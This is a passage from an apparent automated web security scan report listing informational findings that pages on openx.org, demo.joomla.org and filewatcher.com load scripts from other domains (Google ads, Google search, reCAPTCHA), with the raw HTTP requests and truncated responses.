<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

21.48. http://d1.openx.org/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/afr.php

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

21.49. http://demo.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB

Request

Response

21.50. http://demo.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB

Request

GET /index.php HTTP/1.1
Host: demo.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; __utmb=228838275.1.10.1295835725;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:25:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:25:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en-gb"
lang="en-gb"
...[SNIP]...
<div id="demoCaptcha">

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB"></script>
...[SNIP]...

21.51. http://dir.filewatcher.com/d/FreeBSD.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:45:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3to4ywmN8zS7Go3wRoUzdA"
Content-Length: 7911
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 13:45:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 4942
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/</title>
</head>
<body
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.52. http://dir.filewatcher.com/d/FreeBSD/6-stable.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zn3VqZn6o6+vqkKR6xH50w"
Content-Length: 4753
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 198
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/6-stable/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.53. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZdEUUKqgOBWrwlZy7TjtZA"
Content-Length: 20741
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 195
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.54. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+zdjYtQZqpO3zHKlkKVj6Q"
Content-Length: 25529
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 192
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.55. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8+frb9HphK5dyFIISMCQmg"
Content-Length: 26078
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 190
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.56. http://dir.filewatcher.com/d/FreeBSD/6.2-release.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.2-release.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.2-release.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sQZZdgTimuhSOrUYI85R2A"
Content-Length: 4771
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 233
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/6.2-release/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.57. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IX+4NbTcwTYmvINLD7P4yg"
Content-Length: 22277
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 231
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.58. http://dir.filewatcher.com/d/FreeBSD/6.3-release.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.3-release.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:45:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wovoUJK7xXuCXEm2nnNB8A"
Content-Length: 4664
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 13:45:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 4911
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/6.3-release/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.59. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m14cFzBrRTyJJddwL+HG4g"
Content-Length: 25745
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.60. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MrP66mXsA4WtHHC/w3asQw"
Content-Length: 25643
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.61. http://dir.filewatcher.com/d/FreeBSD/7-current.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vpbhFP/nU1vPjmvIqFS+2g"
Content-Length: 4759
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 230
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/7-current/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.62. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "pouNGBNzVznpm4Rmeuxu8A"
Content-Length: 15932
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 215
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/7-current/amd64/</title
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.63. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "pAEPFOHU2mnYiuFV7WGw+w"
Content-Length: 25095
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 216
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.64. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "L0usVmTHrXrSD7hv8gWhAg"
Content-Length: 23138
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 217
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.65. http://dir.filewatcher.com/d/FreeBSD/7.0-release.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fLtSn22yj+pSHx2NHIp0AA"
Content-Length: 4664
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 215
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
